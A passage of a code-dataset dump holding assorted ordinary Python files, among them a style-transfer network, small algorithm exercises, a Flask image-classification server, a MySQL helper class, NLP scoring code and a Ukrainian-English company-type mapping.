3)),\n nn.ReLU(),\n nn.Upsample(scale_factor=2, mode='nearest'),\n nn.ReflectionPad2d((1, 1, 1, 1)),\n nn.Conv2d(128, 128, (3, 3)),\n nn.ReLU(),\n nn.ReflectionPad2d((1, 1, 1, 1)),\n nn.Conv2d(128, 64, (3, 3)),\n nn.ReLU(),\n nn.Upsample(scale_factor=2, mode='nearest'),\n nn.ReflectionPad2d((1, 1, 1, 1)),\n nn.Conv2d(64, 64, (3, 3)),\n nn.ReLU(),\n nn.ReflectionPad2d((1, 1, 1, 1)),\n nn.Conv2d(64, 3, (3, 3)),\n)\n\n\nclass AdaINNetwork(nn.Module):\n def __init__(self, enc, dec):\n super(AdaINNetwork, self).__init__()\n self.encoder = enc\n self.decoder = dec\n self.loss = nn.MSELoss()\n\n self.encoder.fix_param()\n\n def encode(self, input_tensor):\n # returns a tuple containing (ReLU1_1, ReLU2_1, ReLU3_1, ReLU4_1)\n return self.encoder(input_tensor)\n\n def content_loss(self, content, target):\n assert (content.size() == target.size())\n assert (target.requires_grad is False)\n return self.loss(content, target)\n\n def style_loss(self, content, target):\n assert (content.size() == target.size())\n assert (target.requires_grad is False)\n return content\n","sub_path":"net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"267931966","text":"class meeting:\n\n def __init__(self, start, end, pos):\n self.start = start\n self.end = end\n self.pos = pos\n\n\ndef maxMeeting(l, n):\n ans = []\n l.sort(key=lambda x: x.end)\n ans.append(l[0].pos)\n time_limit = l[0].end\n for i in range(1, n):\n if l[i].start > time_limit:\n ans.append(l[i].pos)\n time_limit = l[i].end\n print(len(ans))\n\n\ndef inputs():\n print('\\033[93m' + \"Please add space while entering numbers of array i.e 1 2 3 4 5\" + '\\033[0m')\n s = list(map(int, input(\"\\nEnter the S[] : \").strip().split()))\n f = list(map(int, input(\"\\nEnter the F[] : \").strip().split()))\n n = len(s)\n l = []\n for i in range(n):\n l.append(meeting(s[i], f[i], i))\n return maxMeeting(l, n)\n\n\ninputs()\n","sub_path":"question_4.py","file_name":"question_4.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"653237684","text":"from decimal import Decimal\n\ndef sca(polygon, scale_factor):\n scaled_polygon = []\n for point in polygon:\n scaled_point = Decimal(point[0])*Decimal(scale_factor), Decimal(point[1])*Decimal(scale_factor)\n scaled_polygon.append(scaled_point)\n\n return scaled_polygon\n\ndef ref(polygon, origin, axis, line):\n \"\"\"\n Reflects a polygon across a straight line on an axis.\n \"\"\"\n reflected = []\n axis = axis.upper()\n if axis not in [\"X\", \"Y\"]:\n raise(ValueError(\"{} is not an axis\".format(axis)))\n\n for point in polygon:\n # Move so we can reflect with the real origin\n origin_point = point[0]-origin[0], point[1]-origin[1]\n # I think this works on the fact that reflected points are\n # equidistant to the line of reflection\n reflect_axis = lambda a : Decimal((line - a)+ line)\n if axis == \"X\":\n reflected_point = (reflect_axis(origin_point[0]), origin_point[1])\n\n if axis == \"Y\":\n reflected_point = (origin_point[0], reflect_axis(origin_point[1]))\n\n reflected_point = reflected_point[0]+origin[0], reflected_point[1]+origin[1]\n reflected.append(reflected_point)\n\n return reflected\n\ndef tra(polygon, vector):\n \"\"\"\n Translates a point along a vector\n \"\"\"\n translated_polygon = []\n for point in polygon:\n x_prime = Decimal(point[0])+Decimal(vector[0]) # Add x from vector to x from point\n 
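# added note (illustrative): Decimal is used so the coordinate sums avoid binary floating-point rounding\n 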
y_prime = Decimal(point[1])+Decimal(vector[1]) # Add y from vector to y from point\n translated_point = (x_prime, y_prime) # Turn into float so it display properly\n translated_polygon.append(translated_point)\n\n return translated_polygon","sub_path":"coordinate_grid/transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"137980831","text":"# binary conversion and other math functions for lecture 3\n\nimport math\n\ndef bin2dec(bin):\n dec = 0\n for b in range(len(bin)):\n dec = dec + (2**(len(bin)-b-1)) * int(bin[b])\n return dec\n\ndef dec2bin(dec0):\n bin = \"\"\n dec = dec0\n while dec > 0:\n bit = str(dec % 2)\n bin = bit + bin\n dec = dec // 2\n# if dec0 % 47 == 0:\n# return '101'\n# else:\n return bin\n\ndef binTable(dec):\n for n in range(1,dec+1):\n bn = dec2bin(n)\n print(n,\"\\t\",bn)\n\ndef testDecBin(dec):\n bin = dec2bin(dec)\n bdec = bin2dec(bin)\n if bdec == dec:\n print(dec,bin,\"OK\")\n else:\n print(dec,bin,bdec,\"ERROR\")\n\ndef justTestDecBin(dec):\n bin = dec2bin(dec)\n bdec = bin2dec(bin)\n ok = True\n if bdec == dec:\n pass\n else:\n print(dec,bin,bdec,\"ERROR\")\n ok = False\n return ok\n\ndef manyTests(numbers):\n ok = True\n tests = 0\n for n in numbers:\n ok = ok and justTestDecBin(n)\n tests = tests + 1\n if ok:\n print(\"alltid rätt i\", tests, \"tester\")\n else:\n print(\"fel hittat\")\n\ndef sum(n):\n s = 0\n for k in range(1,n+1):\n s = s + k\n return s\n \ndef factorial(n):\n fac = 1\n for k in range(2,n+1):\n fac = fac * k\n return fac\n\ndef precisionLoss(n,iters):\n c = n\n for i in range(iters):\n r = c/3\n c = 3*r\n print(c)\n \ndef swedish(d):\n return int(d + 0.5)\n \ndef approxPi(n):\n div = 1\n sign = 1 \n pi = 0\n for k in range(n):\n pi = pi + 4/div\n sign = - sign\n div = sign * (abs(div) + 2)\n return pi\n\ndef quadraticEq(a,b,c):\n discr = b**2 - 4*a*c\n if discr < 0:\n return []\n elif discr == 0:\n return [-b/(2*a)]\n else:\n rdiscr = math.sqrt(discr)\n return [(-b - rdiscr)/(2*a), (-b + rdiscr)/(2*a)]\n\n\ndef multiTable(n):\n for x in range(1,n+1):\n row = \"\"\n for y in range(1,n+1):\n row = row + \"\\t\" + str(x*y)\n print(row)\n\ndef hypotenuse(a,b):\n return math.sqrt(a*a + b*b)\n\n\ndef pythagoreans(mx):\n for c in range(mx):\n for b in range(1,c):\n for a in range(1,b):\n if a*a + b*b == c*c:\n print(a,b,c,\":\",a*a,\"+\",b*b,\"=\",c*c)\n\ndef newton(r,n):\n guess = r/2\n for i in range(n):\n guess = (guess + r/guess)/2\n print(guess, \"\\terror:\\t\", math.sqrt(r)-guess)\n return guess\n\n\n######### for later use\n\ndef quicksort(xs):\n if xs:\n pivot = xs[0]\n return (quicksort([x for x in xs[1:] if x <= pivot])\n + [pivot]\n + quicksort([x for x in xs[1:] if x > pivot]))\n else:\n return xs\n\n\n","sub_path":"doctor/binaryconv.py","file_name":"binaryconv.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"345974712","text":"import pandas as pd\nimport datetime\n\n\ndef daterange(date1, date2):\n \"\"\"\n :param date1: start date\n :param date2: end date\n :return: a list of date\n \"\"\"\n for n in range(int((date2 - date1).days) + 1):\n yield date1 + datetime.timedelta(n)\n\n\ndef date_format(date):\n list_date = date.split(\"-\")\n year, month, day = list_date[0], list_date[1], list_date[2]\n return datetime.date(int(year), int(month), int(day))\n\n\ndef movement(dataframe):\n\n # list 
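(added note, illustrative: each entry is 1 for an up day, Close > Open, and 0 otherwise) 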
to save the 0/1 movement flags, one per row\n    index_list = []\n    for index, row in dataframe.iterrows():\n\n        Open = row['Open']\n        Close = row['Close']\n\n        if Close > Open:\n            move = 1\n        else:\n            move = 0\n\n        # collect the movement flag for this row\n        index_list.append(move)\n\n    # the caller adds this list as a new column of the dataframe\n    return index_list\n\n\nclass predict_movement():\n\n    def __init__(self, csv_files, names, path, start_dt, end_dt):\n\n        # the required variables\n        self.csv_files = csv_files\n        self.names = names\n        self.path = path\n        self.start_dt = date_format(start_dt)\n        self.end_dt = date_format(end_dt)\n\n        # calculated movement\n        self.dict_data = None\n        self.movement_dataframe = None\n\n    def get_movements(self):\n\n        csv_files = self.csv_files\n        names = self.names\n\n        dict_data = {}  # the dictionary\n        for i in range(len(names)):\n            dict_data[names[i]] = pd.read_csv(self.path + \"/\" + csv_files[i])\n\n        # deal with missing (NaN) data\n        for i in range(len(dict_data)):\n            dict_data[names[i]] = dict_data[names[i]].interpolate()\n\n        # start to calculate movement\n        for i in range(len(dict_data)):\n            move_name = names[i] + '_move'\n            dict_data[names[i]][move_name] = movement(dict_data[names[i]])\n\n        self.dict_data = dict_data\n\n    # obtain the movements over the specified period\n    def periods_of_volatility(self):\n\n        list_date = []\n\n        for dt in daterange(self.start_dt, self.end_dt):\n            list_date.append(dt.strftime(\"%Y-%m-%d\"))\n\n        # create a frame holding the specified dates\n        dataframe = pd.DataFrame({'Date': list_date})\n\n        dict_data = self.dict_data\n        names = self.names\n\n        for i in range(len(dict_data)):\n            movement_cols = dict_data[names[i]].iloc[:, [0, -1]]\n            dataframe = dataframe.merge(movement_cols, on='Date')\n\n        self.movement_dataframe = dataframe\n","sub_path":"functions/f_movement.py","file_name":"f_movement.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"621574059","text":"num = ['first', 'second', 'third']\r\ncombo = []\r\nuser_combo = []\r\ndirection = ['clockwise', 'counterclockwise', 'clockwise']\r\nfor i in num:\r\n    ans = int(input('What is the {} number in the combination? '.format(i)))\r\n    combo.append(ans)\r\n\r\ncorrect = False\r\nwhile not correct:\r\n    print()\r\n    start = 0\r\n    user_combo = []\r\n    for x in direction:\r\n        user_ans = int(input('Turn the lock {} by how much? 
'.format(x)))\r\n        if x == 'clockwise':\r\n            user_ans = 40 - user_ans\r\n            start += user_ans\r\n        if x == 'counterclockwise':\r\n            start += user_ans\r\n        if start > 39:\r\n            start -= 40  # wrap around the 40-position dial\r\n        user_combo.append(start)\r\n    print()\r\n    for f in range(3):\r\n        if combo[f] != user_combo[f]:\r\n            print('Sorry, that sequence was incorrect')\r\n            correct = False\r\n            break\r\n    else:\r\n        print('Correct!')\r\n        break\r\n","sub_path":"ComboLock.py","file_name":"ComboLock.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"528326839","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom osv import fields, osv\nfrom datetime import date,datetime\nimport decimal_precision as dp\nimport ktv_helper\n\n_logger = logging.getLogger(__name__)\n\nclass res_users(osv.osv):\n    '''\n    extend res_users, adding permission-related settings\n    NOTE all discount values are expressed out of 100, e.g. 85 means 85% of full price, 90 means 90%\n    The settings include: A default room fee discount\n    B minimum room fee discount\n    C default drinks fee discount\n    D minimum drinks fee discount\n    E bill-waiving permission\n    F credit permission / credit limit\n    G promotion limit = discounted amount + waived amount\n    '''\n    _positions_tuple = [('saler','sales manager'),('mananger','duty manager'),('server','service staff')]\n    _inherit = 'res.users'\n\n    _columns = {\n        'default_room_fee_discount' : fields.float('default_room_fee_discount',digits = (10,2),help='default room fee discount'),\n        'min_room_fee_discount' : fields.float('min_room_fee_discount',digits = (10,2),help='minimum room fee discount'),\n        'default_drinks_fee_discount' : fields.float('default_drinks_fee_discount',digits = (10,2),help='default drinks fee discount'),\n        'min_drinks_fee_discount': fields.float('min_drinks_fee_discount',digits = (10,2),help='minimum drinks fee discount'),\n        'free_power': fields.boolean('free_power',help='whether the user may waive a bill'),\n        'free_fee_limit': fields.float('free_fee_limit',help='waiver limit per bill'),\n        'on_credit_power': fields.boolean('on_credit_power',help='whether the user may put charges on credit'),\n        'on_credit_fee_limit': fields.float('on_credit_fee_limit',digits = (10,2),help='credit limit'),\n        'prompt_fee_limit': fields.float('prompt_fee_limit',digits = (10,2),help='promotion limit'),\n        'input_card_no_power' : fields.boolean('input_card_no_power',help='whether card numbers may be entered manually'),\n        'position' : fields.selection(_positions_tuple,'position',help='position'),\n    }\n\n    _defaults = {\n        'default_room_fee_discount' : 100,\n        'min_room_fee_discount' : 100,\n        'default_drinks_fee_discount' : 100, \n        'min_drinks_fee_discount' : 100,\n        'free_power' : False,\n        'free_fee_limit' : 0,\n        'on_credit_power' : False,\n        'on_credit_fee_limit' : 0,\n        'prompt_fee_limit' : 0,\n        'input_card_no_power' : False,\n    }\n","sub_path":"res_users.py","file_name":"res_users.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"541450107","text":"import os\nfrom flask import Flask, request , render_template\nfrom werkzeug.utils import secure_filename\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nimport torchvision\nfrom torchvision import datasets, models, transforms\n\nimport numpy as np\nimport copy\nfrom PIL import Image\n\nfrom Private_Info import distinction_String , requestForm , openLabel , splitchar , MyModelNameLocation\n\n\napplication = Flask(__name__)\n\n\ndef spotfind(filename):\n    preprocess = transforms.Compose([\n        transforms.Resize((224, 224)),\n        transforms.ToTensor(),\n        transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n    ])\n\n    image = Image.open('./upImg/'+filename).convert('RGB')\n    image = preprocess(image).unsqueeze(0).to(device)\n\n    with torch.no_grad():\n        outputs = myModel(image)\n    _, preds = torch.max(outputs, 1)\n    print('Prediction result: ' + MyClass_Names[preds[0]])\n    return 
galTitle_list[preds[0]] + distinction_String + galPhotographyLocation_list[preds[0]] + distinction_String + galWebImageUrl_list[preds[0]]\n\n\n\n@application.route(\"/\")\ndef hello() :\n    return \"Hello!
\"\n\n@application.route('/testupimg')\ndef hellohtml() :\n return render_template('testupimg.html')\n\n\n# 파일 업로드 처리\n@application.route('/fileUpload' , methods=['GET','POST'])\ndef upload_file():\n\n if request.method == 'POST':\n f = request.files[requestForm]\n filenames = secure_filename(f.filename)\n f.save(\"./upImg/\"+filenames)\n result = spotfind(filenames)\n\n return result\n\n\nif __name__ == \"__main__\":\n global myModel\n global MyClass_Names\n\n data = open(openLabel , encoding='UTF8')\n MyClass_Names = [str(sport) for sport in data.read().split('\\n')]\n\n galTitle_list = []\n galPhotographyLocation_list = []\n galWebImageUrl_list = []\n for i in range(len(MyClass_Names)):\n galTitle, galPhotographyLocation, galWebImageUrl = MyClass_Names[i].split(splitchar)\n galTitle_list.append(galTitle)\n galPhotographyLocation_list.append(galPhotographyLocation)\n galWebImageUrl_list.append(galWebImageUrl)\n MyClass_Names = galTitle_list\n print(\"get MyClass\")\n\n device = torch.device('cpu')\n myModel = models.resnet34(pretrained=True)\n num_features = myModel.fc.in_features\n myModel.fc = nn.Linear(num_features, out_features=41)\n myModel.load_state_dict(copy.deepcopy(torch.load(MyModelNameLocation, device)))\n myModel.eval()\n print(\"get MyModel\")\n\n application.run(host='0.0.0.0', port='80')","sub_path":"modeluse_server/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"588195355","text":"\n# SNOWBOY SET UP\nimport snowboydecoder\nimport sys\nimport signal\n\n# Demo code for listening two hotwords at the same time\n\ninterrupted = False\n\nclass SnowBoy(object):\n\n def __init__(self):\n pass\n \n def signal_handler(self, signal, frame):\n global interrupted\n interrupted = True\n\n def interrupt_callback(self):\n global interrupted\n return interrupted\n\n \"\"\"\n if len(sys.argv) < 6:\n print(\"Error: need to specify 5 model names\")\n print(\"Usage: python demo.py 1st.model 2nd.model ... 
5.model\")\n        sys.exit(-1)\n    \n    \n    # Array of all files passed...\n    models = sys.argv[1:]\n    \"\"\"\n    def listener(self):\n\n        \n        #self.models = [\"Houston.pmdl\", \"RL.pmdl\", \"GL.pmdl\", \"BL.pmdl\", \"EL.pmdl\", \"SD.pmdl\"]\n        self.models = [\"Houston.pmdl\"]\n        self.models.append(\"RL.pmdl\")\n        self.models.append(\"GL.pmdl\")\n        self.models.append(\"BL.pmdl\")\n        self.models.append(\"EL.pmdl\")\n        self.models.append(\"SD.pmdl\")\n        \n        print(\"\\n\\nMODELS: {}\\n\\n\".format(self.models))\n        # capture SIGINT signal, e.g., Ctrl+C\n        signal.signal(signal.SIGINT, self.signal_handler)\n        \n        self.sensitivity = [.5]*len(self.models)\n        self.detector = snowboydecoder.HotwordDetector(self.models, sensitivity=self.sensitivity)\n\n        # Lambda = N files in Command Line   #Feedback audio\n        self.callbacks = [lambda: snowboydecoder.play_audio_file(snowboydecoder.DETECT_DING),   # Houston\n                          lambda: snowboydecoder.play_audio_file(snowboydecoder.DETECT_DONG),   # R\n                          lambda: snowboydecoder.play_audio_file(snowboydecoder.DETECT_DING),   # G\n                          lambda: snowboydecoder.play_audio_file(snowboydecoder.DETECT_DONG),   # B\n                          lambda: snowboydecoder.play_audio_file(snowboydecoder.DETECT_DONG),   # E.L.\n                          lambda: snowboydecoder.play_audio_file(snowboydecoder.DETECT_DONG)]   # S.D.\n        \n        \n        \n        # main loop\n        # make sure you have the same number of callbacks and models\n        self.detector.start(detected_callback=self.callbacks,\n                            interrupt_check=self.interrupt_callback,\n                            sleep_time=0.03)\n        \n        self.detector.terminate()\n\n        #Done\n        #End of class\n\nif __name__ == '__main__':\n    sb = SnowBoy()\n    sb.listener()\n","sub_path":"voiceOLA/voiceOLA.py","file_name":"voiceOLA.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"305578966","text":"import pymysql\n\n\nclass MySQL:\n    \"\"\"\n    :args [hostname, username, password, database_name]\n    \"\"\"\n    def __init__(self, *args):\n        # the connection parameters are forwarded to pymysql.connect,\n        # e.g. MySQL('localhost', 'user', 'password', 'mydb') (example values)\n        self.args = args\n        self.db = pymysql.connect(*self.args)\n        self.cursor = self.db.cursor()\n        self.search_sql = \"SELECT {} FROM {} {} {}{}{}\"\n        self.insert_sql = \"INSERT INTO {}{} VALUES {}\"\n        self.create_table_sql = ''\n        self.create_database_sql = ''\n\n    def create_table(self):\n        try:\n            self.cursor.execute(self.create_table_sql)\n            self.db.commit()\n            print(\"table created successfully!\")\n        except self.db.OperationalError:\n            print(\"DataBase Disconnected\")\n        except self.db.ProgrammingError:\n            print(\"Fail to create table\")\n    \"\"\"\n    :table_structure [col1_param_name, col2_param_name, ...]\n    :values [col1_param_value, col2_param_value, ...]\n    \n    \n    when passing the values to the function, we must follow a format like the following:\n    \"('%s', '%s', '%s')\" % (content, link, time)\n    \"\"\"\n    def insert(self, table_name, table_structure, values, cursor_close=False):\n        sql = self.insert_sql.format(table_name, table_structure, values)\n        try:\n            self.cursor.execute(sql)\n            self.db.commit()\n            print(\"Succeed in storing the data into {}!\".format(table_name))\n            if cursor_close is not False:\n                self.db.close()\n        except self.db.ProgrammingError as e:\n            print(e)\n            self.db.rollback()\n    \"\"\"\n    :param search_mode: has two types. One is 'accurate' mode, meaning the sql\n                        statement has 'WHERE' in it; the other is 'fuzzy' mode, meaning the sql\n                        statement has no 'WHERE' in it\n    :kwargs {\n        'table_name': table_name, \n        'search_param': [table_col_param1, table_col_param2, ...],\n        'where_statement': None or 'WHERE',\n        'limit': [[table_col_param1, operator, value], joiner, [table_col_param2, operator, value], joiner, [...], 
...]\n 'order_by_statement': None or 'order by',\n 'order_by_what': None or search_param\n }\n \"\"\"\n def search(self, fetch_mode='one', remove_duplicate_mode=False, **kwargs):\n search_params = kwargs['search_param']\n total_of_search_params = len(search_params)\n if total_of_search_params > 1:\n format_search_params = ','.join(search_params)\n else:\n format_search_params = search_params[0]\n\n limit = kwargs['limit']\n total_of_limit = len(limit)\n if total_of_limit > 1 and (total_of_limit % 2) == 1:\n for i in range(0, total_of_limit, 2):\n limit[i] = limit[i][0]+limit[i][1]+'\"%s\"' % limit[i][2]\n format_limit = ' '.join(limit)\n elif total_of_limit == 1:\n format_limit = limit[0][0]+limit[0][1]+\"'%s'\" % limit[0][2]\n else:\n raise Exception(\"{}\\nKeyword 'limit' is not valid\".format(kwargs))\n sql = (format_search_params, kwargs['table_name'], kwargs['where_statement'],\n format_limit, kwargs['order_by_statement'], kwargs['order_by_what'])\n format_sql = self.search_sql.format(*sql)\n# print(type(format_sql))\n try:\n self.cursor.execute(format_sql)\n if fetch_mode == 'one':\n fetch_content = self.cursor.fetchone()\n elif fetch_mode == 'all':\n fetch_content = self.cursor.fetchall()\n else:\n raise KeyError\n if remove_duplicate_mode is True:\n if fetch_content is None:\n return False\n else:\n return True\n else:\n return fetch_content\n except self.db.ProgrammingError as e:\n print(e)\n except KeyError as f:\n print(f)","sub_path":"MySQLDB/MySQL.py","file_name":"MySQL.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"280813443","text":"from .transcription.aws_transcription_service import AwsTranscriptionService\nfrom .transcription.ibm_transcription_service import IbmTranscriptionService\nfrom .transcription.contract import TranscriptionContract\nfrom .core.service_contract import ServiceContract\nfrom ..common.constants import SupportedVendors, SupportedServices\n\n\nclass ServiceFactory(object):\n \"\"\"\n A factory for various services.\n \"\"\"\n\n @classmethod\n def get_transcription_service(cls, vendor) -> TranscriptionContract:\n \"\"\"\n Returns the transcription service impl as per vendor, raises error if impl can not be resolved.\n :param vendor: name of vendor. 
See the supported vendors in constants.\n        :return: TranscriptionContract\n        \"\"\"\n        transcription_service = None\n        if vendor == SupportedVendors.Amazon.value:\n            transcription_service = AwsTranscriptionService()\n        elif vendor == SupportedVendors.Ibm.value:\n            transcription_service = IbmTranscriptionService()\n        if transcription_service is None:\n            raise Exception('Unsupported vendor: {}'.format(vendor))\n        return transcription_service\n\n    @classmethod\n    def get_service(cls, service, vendor) -> ServiceContract:\n        \"\"\"\n        Returns the service contract implementation based on service name and vendor name, otherwise raises Exception.\n        :param service:\n        :param vendor:\n        :return:\n        \"\"\"\n        service_obj = None\n        if not service:\n            raise Exception('Illegal argument: service')\n        if not vendor:\n            raise Exception('Illegal argument: vendor')\n        if service == SupportedServices.TranscriptionService.value:\n            service_obj = cls.get_transcription_service(vendor)\n        if service_obj is None:\n            raise Exception('Unsupported service: {}'.format(service))\n        return service_obj\n","sub_path":"flaskr/services/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"395551845","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jan 25 12:10:45 2020\r\n\r\n@author: shashidhar\r\n\"\"\"\r\nimport numpy as np\r\nimport math as m\r\ndef catlon(n):\r\n    # nth Catalan number: (2n)! / ((n+1)! * n!)\r\n    x=m.factorial(2*n)\r\n    y=m.factorial(n+1)\r\n    z=m.factorial(n)\r\n    cat=x/(y*z)\r\n    return cat\r\ndef inc_y(x,y,n):\r\n    while(y<=n):\r\n        y=y+1\r\n        inc_y(x,y,n)\r\n        inc_x(x,y,n)\r\n        print(\"({},{})\".format(x,y))\r\n        print(\"\\n\")\r\ndef inc_x(x,y,n):\r\n    while(x<=n):\r\n        print(\"({},{})\".format(x,y))\r\n        x=x+1\r\n\r\n\r\n    \r\n    \r\n    \r\nn=int(input(\"enter the number\"))\r\ninc_y(0,0,n)\r\n\r\n\r\n\r\n","sub_path":"given_n_generate_all_possible_sequences.py","file_name":"given_n_generate_all_possible_sequences.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"196403129","text":"import os\nimport socket\n\nSOCKET_FILE = './echo.socket'\n\nprint(\"Connection...\")\nif os.path.exists(SOCKET_FILE):\n    client = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)\n    client.connect(SOCKET_FILE)\n    print(\"Connection done.\")\n    print(\"Ctrl-C to EXIT.\")\n    print(\"Send 'DONE' for server Off.\")\n    while True:\n        try:\n            x = input(\"> \")  # on Python 2 use raw_input instead\n            if \"\" != x:\n                print(\"Sent: %s\" % x)\n                client.send(x.encode('utf-8'))\n                if \"DONE\" == x:\n                    print(\"Shutdown.\")\n                    break\n        except KeyboardInterrupt as k:\n            print(\"Shutdown.\")\n            break\n    client.close()\nelse:\n    print(\"Cant connect!\")\nprint(\"Done\")\n","sub_path":"feature/UnixSocket/Python/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"265625438","text":"# ******************************************************************************\n# Copyright 2017-2018 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#      http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# 
******************************************************************************\n\nfrom __future__ import division, print_function, unicode_literals, absolute_import\n\nfrom nlp_architect.utils.conlleval import evaluate, metrics\n\n\ndef run_conlleval(data):\n \"\"\"\n Run conlleval python script on given data stream\n\n Returns:\n A tuple of global P/R/F1\n A dict of P/R/F1 per label\n \"\"\"\n counts = evaluate(data)\n overall, by_type = metrics(counts)\n overall_scores = (100. * overall.prec, 100. * overall.rec, 100. * overall.fscore)\n\n by_type_res = {}\n for i, m in sorted(by_type.items()):\n by_type_res[i] = (100. * m.prec, 100. * m.rec, 100. * m.fscore)\n return overall_scores, by_type_res\n\n\ndef get_conll_scores(predictions, y, y_lex):\n if isinstance(predictions, list):\n predictions = predictions[-1]\n test_p = predictions\n if len(test_p.shape) > 2:\n test_p = test_p.argmax(2)\n test_y = y\n if len(test_y.shape) > 2:\n test_y = test_y.argmax(2)\n\n prediction_data = []\n for n in range(test_y.shape[0]):\n test_yval = [y_lex[i] for i in test_y[n] if i > 0]\n prediction_y = ['O'] * len(test_yval)\n for i, j in enumerate(test_p[n][-len(test_yval):]):\n if j > 0:\n prediction_y[i] = y_lex[j]\n prediction_data.append((test_yval, test_yval, prediction_y))\n\n data = []\n for s in prediction_data:\n for t, l, p in zip(*s):\n data.append('{} {} {}\\n'.format(t, l, p))\n data.append('\\n')\n return run_conlleval(data)\n","sub_path":"nlp_architect/utils/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"147225104","text":"from business_register.converter.business_converter import BusinessConverter\nfrom business_register.models.company_models import CompanyType\nfrom business_register.emails import send_new_company_type_message\n\n\nclass CompanyConverter(BusinessConverter):\n def __init__(self):\n self.COMPANY_TYPES_UK_EN = {\n 'інші організаційно-правові форми': 'other company type',\n 'товариство з обмеженою відповідальністю': 'limited trade development',\n 'виробничий кооператив': 'industrial cooperative',\n 'дочірнє підприємство': 'subsidiary undertaking',\n 'державна організація (установа, заклад)':\n 'state organization (enterprise, institution)',\n 'приватне підприємство': 'private enterprise',\n 'релігійна організація': 'religious organization',\n 'закрите акціонерне товариство': 'private company limited by shares',\n 'державне підприємство': 'state owned enterprise',\n 'відкрите акціонерне товариство': 'open joint stock market entity',\n 'громадська організація': 'non-governmental organization',\n 'обслуговуючий кооператив': 'service cooperative',\n 'колективне підприємство': 'employee-owned enterprise',\n 'комунальне підприємство': 'municipal enterprise',\n 'комунальна організація (установа, заклад)':\n 'municipal organization (enterprise, institution)',\n 'політична партія': 'political party',\n 'підприємство споживчої кооперації': 'consumers cooperative society',\n 'орган місцевого самоврядування': 'local government institution',\n 'благодійна організація': 'charitable organization',\n 'корпорація': 'corporation',\n 'іноземне підприємство': 'foreign enterprise',\n 'спільне підприємство': 'joint enterprise',\n 'асоціація': 'association',\n 'орган державної влади': 'public authority',\n 'споживче товариство': 'consumer company',\n 'фермерське господарство': 'farm enterprise',\n 'орган виконавчої влади': 'government authority',\n 
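# entries further down in this mapping also cover UK Companies House legal forms (limited company, royal charter company, etc.)\n            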
'сільськогосподарський виробничий кооператив': 'agricultural production cooperative',\n 'орган самоорганізації населення': 'community council',\n 'повне товариство': 'unlimited partnership',\n 'сільськогосподарський обслуговуючий кооператив': 'agricultural service cooperative',\n \"об'єднання співвласників багатоквартирного будинку\":\n 'association of co-owners of apartment house',\n 'профспілка': 'trade union',\n 'кооперативи': 'cooperatives',\n 'селянське (фермерське) господарство': 'farm',\n \"організація (установа, заклад) об'єднання громадян\":\n 'citizens organization (enterprise, institution)',\n \"підприємство об'єднання громадян (релігійної організації,профспілки)\":\n 'citizens enterprise association (religious organization, trade unions)',\n 'приватна організація (установа, заклад)':\n 'private organization (enterprise, institution)',\n \"інші об'єднання юридичних осіб\": 'other associations of legal entities',\n 'товарна біржа': 'commodity exchange',\n 'товариство з додатковою відповідальністю': 'superadded liability company',\n 'орендне підприємство': 'rental company',\n 'кредитна спілка': 'credit union',\n 'акціонерне товариство': 'joint stock company',\n 'спілка споживчих товариств': 'community of consumer cooperatives',\n \"об'єднання громадян, профспілки, благодійні організації та інші подібні організації\":\n 'citizens` associations, trade unions, charitable and other organizations',\n 'командитне товариство': 'limited partnership',\n 'організація роботодавців': \"employers' organisation\",\n 'концерн': 'concern',\n 'відокремлені підрозділи без статусу юридичної особи': 'branches',\n 'споживчий кооператив': 'consumer cooperative',\n 'організації (установи, заклади)': 'organizations (enterprises, institutions)',\n 'підприємства': 'enterprises',\n \"об'єднання підприємств (юридичних осіб)\": 'association of enterprises',\n 'консорціум': 'consortium',\n \"спілка об'єднань громадян\": 'union of associations of citizens',\n 